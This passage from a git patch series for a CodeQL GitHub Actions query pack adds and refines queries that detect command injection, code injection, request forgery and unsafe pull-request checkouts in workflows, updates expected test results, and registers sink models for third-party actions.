.github/workflows/issue_comment_3rd_party_action.yml:50:9:53:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | @@ -18,4 +18,5 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 5130135df0a87da6f23eba4b81b11383b254b19a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:14:55 +0100 Subject: [PATCH 109/707] fix(stepsExpression): allow steps from a composite action to communicate --- ql/lib/codeql/actions/ast/internal/Ast.qll | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5c6ce37fa928..f45565caed77 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -855,7 +855,14 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getEnclosingJob() = result.getEnclosingJob() and + ( + this.getEnclosingJob() = result.getEnclosingJob() + or + exists(CompositeActionImpl a | + a.getAChildNode*() = this and + a.getAChildNode*() = result + ) + ) and result.(StepImpl).getId() = stepId } From cfed2d4ce029136bab61eefaaf666c77ecbff8d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:30:23 +0100 Subject: [PATCH 110/707] Split queries --- ql/src/Security/CWE-078/CommandInjection.ql | 38 +++++++++++++++ .../CWE-078/CriticalCommandInjection.ql | 44 ++++++++++++++++++ ql/src/Security/CWE-094/CodeInjection.ql | 40 ++++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.ql | 46 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 +- ql/src/Security/CWE-918/RequestForgery.ql | 37 +++++++++++++++ 6 files changed, 206 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-078/CommandInjection.ql create mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-094/CodeInjection.ql create mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql create mode 100644 ql/src/Security/CWE-918/RequestForgery.ql diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql new file mode 100644 index 000000000000..2a2225e17b6e --- /dev/null +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -0,0 +1,38 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql new file mode 100644 index 000000000000..3834b0ac0d06 --- /dev/null +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -0,0 +1,44 @@ +/** + * @name Command built from user-controlled sources + * @description Building a system command from user-controlled sources is vulnerable to insertion of + * malicious code by the user. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-078 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CommandInjectionSink extends DataFlow::Node { + CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql new file mode 100644 index 000000000000..7ad0e98bc492 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -0,0 +1,40 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql new file mode 100644 index 000000000000..5a4bbaca034a --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -0,0 +1,46 @@ +/** + * @name Code injection + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class CodeInjectionSink extends DataFlow::Node { + CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w +where + MyFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 33d6260203ef..d59cc07cad26 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,8 +20,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, - ["expression-injection", "command-injection", "request-forgery", "code-injection"]) + externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql new file mode 100644 index 000000000000..3675597fcd74 --- /dev/null +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -0,0 +1,37 @@ +/** + * @name Uncontrolled data used in network request + * @description Sending network requests with user-controlled data allows for request forgery attacks. + * @kind path-problem + * @problem.severity error + * @security-severity 9.1 + * @precision high + * @id actions/request-forgery + * @tags actions + * security + * external/cwe/cwe-918 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() From a9057a738600f2b01b3bfb8757fc0f7b1ead0cde Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 17:10:35 +0100 Subject: [PATCH 111/707] Add `suite` input --- .github/action/src/codeql.ts | 2 +- action.yml | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 48750388e570..4870ca279551 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: "codeql-suites/actions-code-scanning.qls", + suite: `codeql-suites/${core.getInput("suite")}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; diff --git a/action.yml b/action.yml index 61fd380c4189..a294e9814931 100644 --- a/action.yml +++ b/action.yml @@ -14,6 +14,10 @@ inputs: description: "SARIF File Output" default: "codeql-actions.sarif" + suite: + description: "CodeQL Suite to run" + default: "actions-code-scanning" + runs: using: 'composite' steps: From 678f99b6be23d957b45fd654b9eca9d8d31ada0d Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:14:33 +0000 Subject: [PATCH 112/707] build --- .github/action/dist/index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index e931e22d3f8a..61c4f537ad9f 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28607,7 +28607,7 @@ async function newCodeQL() { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: "codeql-suites/actions-code-scanning.qls", + suite: `codeql-suites/${core.getInput("suite")}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From a9aba88bc5138ad70b88b7f7d116b048171657bc Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 17:21:26 +0100 Subject: [PATCH 113/707] Add alternate value --- .github/action/src/codeql.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 4870ca279551..56615fa80cee 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: `codeql-suites/${core.getInput("suite")}.qls`, + suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From 53209a26b18e2679840fc1ef084bbd984c0bfaf1 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:22:34 +0000 Subject: [PATCH 114/707] build --- .github/action/dist/index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 61c4f537ad9f..4c98f1d63012 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28607,7 +28607,7 @@ async function newCodeQL() { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: `codeql-suites/${core.getInput("suite")}.qls`, + suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From 70dd7fe18fa7e58d3d89def920a39120b621c07d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 17:47:20 +0100 Subject: [PATCH 115/707] Apply suggestions from code review Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/src/Security/CWE-078/CommandInjection.ql | 2 +- ql/src/Security/CWE-078/CriticalCommandInjection.ql | 4 ++-- ql/src/Security/CWE-094/CodeInjection.ql | 4 ++-- ql/src/Security/CWE-094/CriticalCodeInjection.ql | 6 +++--- ql/src/Security/CWE-918/RequestForgery.ql | 2 +- 5 files changed, 9 insertions(+), 9 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 2a2225e17b6e..9891f786f7cb 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -34,5 +34,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 3834b0ac0d06..5d418ec18161 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/command-injection + * @id actions/critical-command-injection * @tags actions * security * external/cwe/cwe-078 @@ -40,5 +40,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 7ad0e98bc492..bc2dbffdcdf8 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -36,5 +36,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 5a4bbaca034a..2a1e4388d24e 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/code-injection + * @id actions/critical-code-injection * @tags actions * security * external/cwe/cwe-094 @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -42,5 +42,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3675597fcd74..d665a368991d 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -33,5 +33,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 1e64b18212fcc69a7d829bf3ae68d84045b9639f Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 19:09:22 +0100 Subject: [PATCH 116/707] Add suite that runs all queries --- ql/src/codeql-suites/actions-all.qls | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 ql/src/codeql-suites/actions-all.qls diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls new file mode 100644 index 000000000000..2439b95a8e55 --- /dev/null +++ b/ql/src/codeql-suites/actions-all.qls @@ -0,0 +1,2 @@ +- description: Standard Code Scanning queries for Actions +- queries: . \ No newline at end of file From d26ead7c3bfd9a609165f70791127538aea1f486 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Wed, 13 Mar 2024 23:22:13 +0100 Subject: [PATCH 117/707] Add security sinks --- ql/lib/ext/8398a7_action-slack.model.yml | 6 +++++ ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 15 ++++++++++++ ...nnn_action-semantic-pull-request.model.yml | 6 +++++ ql/lib/ext/anchore_sbom-action.model.yml | 10 ++++++++ ql/lib/ext/anchore_scan-action.model.yml | 6 +++++ .../ext/andresz1_size-limit-action.model.yml | 9 +++++++ ql/lib/ext/asdf-vm_actions.model.yml | 6 +++++ .../axel-op_googlejavaformat-action.model.yml | 7 ++++++ ql/lib/ext/azure_powershell.model.yml | 6 +++++ ql/lib/ext/bahmutov_npm-install.model.yml | 6 +++++ .../blackducksoftware_github-action.model.yml | 8 +++++++ .../bufbuild_buf-breaking-action.model.yml | 6 +++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 5 ++++ .../ext/bufbuild_buf-setup-action.model.yml | 7 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 +++++ ql/lib/ext/changesets_action.model.yml | 7 ++++++ .../ext/cloudflare_wrangler-action.model.yml | 7 ++++++ .../crazy-max_ghaction-chocolatey.model.yml | 6 +++++ .../crazy-max_ghaction-import-gpg.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 8 +++++++ ql/lib/ext/cypress-io_github-action.model.yml | 6 +++++ .../ext/dailydotdev_action-devcard.model.yml | 7 ++++++ ...me_reportgenerator-github-action.model.yml | 6 +++++ .../daspn_private-actions-checkout.model.yml | 7 ++++++ .../dawidd6_action-ansible-playbook.model.yml | 7 ++++++ ...dawidd6_action-download-artifact.model.yml | 6 +++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 11 +++++++++ ...er-practice_actions-setup-docker.model.yml | 8 +++++++ ql/lib/ext/docker_build-push-action.model.yml | 6 +++++ ql/lib/ext/endbug_latest-tag.model.yml | 9 +++++++ ql/lib/ext/expo_expo-github-action.model.yml | 7 ++++++ ...seextended_action-hosting-deploy.model.yml | 6 +++++ ql/lib/ext/gabrielbb_xvfb-action.model.yml | 7 ++++++ ql/lib/ext/game-ci_unity-builder.model.yml | 7 ++++++ .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 6 +++++ .../ext/go-semantic-release_action.model.yml | 6 +++++ .../golangci_golangci-lint-action.model.yml | 6 +++++ .../ext/gonuit_heroku-docker-deploy.model.yml | 7 ++++++ .../goreleaser_goreleaser-action.model.yml | 6 +++++ ...te-or-update-pull-request-action.model.yml | 9 +++++++ ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 9 +++++++ ql/lib/ext/ilammy_setup-nasm.model.yml | 7 ++++++ ql/lib/ext/imjohnbo_issue-bot.model.yml | 8 +++++++ ql/lib/ext/iterative_setup-cml.model.yml | 6 +++++ ql/lib/ext/iterative_setup-dvc.model.yml | 6 +++++ ...sives_github-pages-deploy-action.model.yml | 11 +++++++++ .../ext/johnnymorganz_stylua-action.model.yml | 6 +++++ .../ext/jurplel_install-qt-action.model.yml | 11 +++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 7 ++++++ ql/lib/ext/leafo_gh-actions-lua.model.yml | 7 ++++++ .../ext/leafo_gh-actions-luarocks.model.yml | 6 +++++ .../lucasbento_auto-close-issues.model.yml | 6 +++++ ql/lib/ext/magefile_mage-action.model.yml | 6 +++++ ql/lib/ext/maierj_fastlane-action.model.yml | 8 +++++++ .../manusa_actions-setup-minikube.model.yml | 9 +++++++ ql/lib/ext/mattdavis0351_actions.model.yml | 9 +++++++ .../ext/meteorengineer_setup-meteor.model.yml | 6 +++++ ql/lib/ext/microsoft_setup-msbuild.model.yml | 7 ++++++ ...hers-excellent_docker-build-push.model.yml | 16 +++++++++++++ ql/lib/ext/msys2_setup-msys2.model.yml | 7 ++++++ ql/lib/ext/mxschmitt_action-tmate.model.yml | 7 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +++++ .../ext/nanasess_setup-chromedriver.model.yml | 6 +++++ ql/lib/ext/nanasess_setup-php.model.yml | 6 +++++ ql/lib/ext/nick-fields_retry.model.yml | 8 +++++++ ql/lib/ext/octokit_graphql-action.model.yml | 6 +++++ ql/lib/ext/octokit_request-action.model.yml | 6 +++++ ql/lib/ext/olafurpg_setup-scala.model.yml | 6 +++++ .../paambaati_codeclimate-action.model.yml | 6 +++++ .../peter-evans_create-pull-request.model.yml | 6 +++++ .../ext/plasmicapp_plasmic-action.model.yml | 8 +++++++ .../preactjs_compressed-size-action.model.yml | 7 ++++++ ql/lib/ext/py-actions_flake8.model.yml | 12 ++++++++++ ...py-actions_py-dependency-install.model.yml | 6 +++++ ql/lib/ext/pyo3_maturin-action.model.yml | 9 +++++++ ...vecircus_android-emulator-runner.model.yml | 24 +++++++++++++++++++ ql/lib/ext/reggionick_s3-deploy.model.yml | 13 ++++++++++ .../ext/renovatebot_github-action.model.yml | 10 ++++++++ .../ext/roots_issue-closer-action.model.yml | 7 ++++++ ql/lib/ext/ros-tooling_setup-ros.model.yml | 6 +++++ ql/lib/ext/ruby_setup-ruby.model.yml | 5 ++++ ...ction-detect-and-tag-new-version.model.yml | 5 ++++ ...skitionek_notify-microsoft-teams.model.yml | 6 +++++ ql/lib/ext/snow-actions_eclint.model.yml | 6 +++++ .../ext/stackhawk_hawkscan-action.model.yml | 10 ++++++++ .../ext/step-security_harden-runner.model.yml | 6 +++++ ql/lib/ext/tibdex_backport.model.yml | 9 +++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 15 ++++++++++++ .../tryghost_action-deploy-theme.model.yml | 7 ++++++ ql/lib/ext/veracode_veracode-sca.model.yml | 9 +++++++ .../ext/wearerequired_lint-action.model.yml | 8 +++++++ ql/lib/ext/webfactory_ssh-agent.model.yml | 8 +++++++ ql/lib/ext/zaproxy_action-baseline.model.yml | 9 +++++++ ql/lib/ext/zaproxy_action-full-scan.model.yml | 9 +++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 ++- 99 files changed, 719 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/8398a7_action-slack.model.yml create mode 100644 ql/lib/ext/amannn_action-semantic-pull-request.model.yml create mode 100644 ql/lib/ext/anchore_sbom-action.model.yml create mode 100644 ql/lib/ext/anchore_scan-action.model.yml create mode 100644 ql/lib/ext/andresz1_size-limit-action.model.yml create mode 100644 ql/lib/ext/asdf-vm_actions.model.yml create mode 100644 ql/lib/ext/axel-op_googlejavaformat-action.model.yml create mode 100644 ql/lib/ext/azure_powershell.model.yml create mode 100644 ql/lib/ext/bahmutov_npm-install.model.yml create mode 100644 ql/lib/ext/blackducksoftware_github-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-setup-action.model.yml create mode 100644 ql/lib/ext/changesets_action.model.yml create mode 100644 ql/lib/ext/cloudflare_wrangler-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml create mode 100644 ql/lib/ext/cycjimmy_semantic-release-action.model.yml create mode 100644 ql/lib/ext/cypress-io_github-action.model.yml create mode 100644 ql/lib/ext/dailydotdev_action-devcard.model.yml create mode 100644 ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml create mode 100644 ql/lib/ext/daspn_private-actions-checkout.model.yml create mode 100644 ql/lib/ext/dawidd6_action-ansible-playbook.model.yml create mode 100644 ql/lib/ext/dawidd6_action-download-artifact.model.yml create mode 100644 ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml create mode 100644 ql/lib/ext/docker-practice_actions-setup-docker.model.yml create mode 100644 ql/lib/ext/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/endbug_latest-tag.model.yml create mode 100644 ql/lib/ext/expo_expo-github-action.model.yml create mode 100644 ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml create mode 100644 ql/lib/ext/gabrielbb_xvfb-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-builder.model.yml create mode 100644 ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml create mode 100644 ql/lib/ext/go-semantic-release_action.model.yml create mode 100644 ql/lib/ext/golangci_golangci-lint-action.model.yml create mode 100644 ql/lib/ext/gonuit_heroku-docker-deploy.model.yml create mode 100644 ql/lib/ext/goreleaser_goreleaser-action.model.yml create mode 100644 ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml create mode 100644 ql/lib/ext/ilammy_msvc-dev-cmd.model.yml create mode 100644 ql/lib/ext/ilammy_setup-nasm.model.yml create mode 100644 ql/lib/ext/imjohnbo_issue-bot.model.yml create mode 100644 ql/lib/ext/iterative_setup-cml.model.yml create mode 100644 ql/lib/ext/iterative_setup-dvc.model.yml create mode 100644 ql/lib/ext/jamesives_github-pages-deploy-action.model.yml create mode 100644 ql/lib/ext/johnnymorganz_stylua-action.model.yml create mode 100644 ql/lib/ext/jurplel_install-qt-action.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-lua.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-luarocks.model.yml create mode 100644 ql/lib/ext/lucasbento_auto-close-issues.model.yml create mode 100644 ql/lib/ext/magefile_mage-action.model.yml create mode 100644 ql/lib/ext/maierj_fastlane-action.model.yml create mode 100644 ql/lib/ext/manusa_actions-setup-minikube.model.yml create mode 100644 ql/lib/ext/meteorengineer_setup-meteor.model.yml create mode 100644 ql/lib/ext/microsoft_setup-msbuild.model.yml create mode 100644 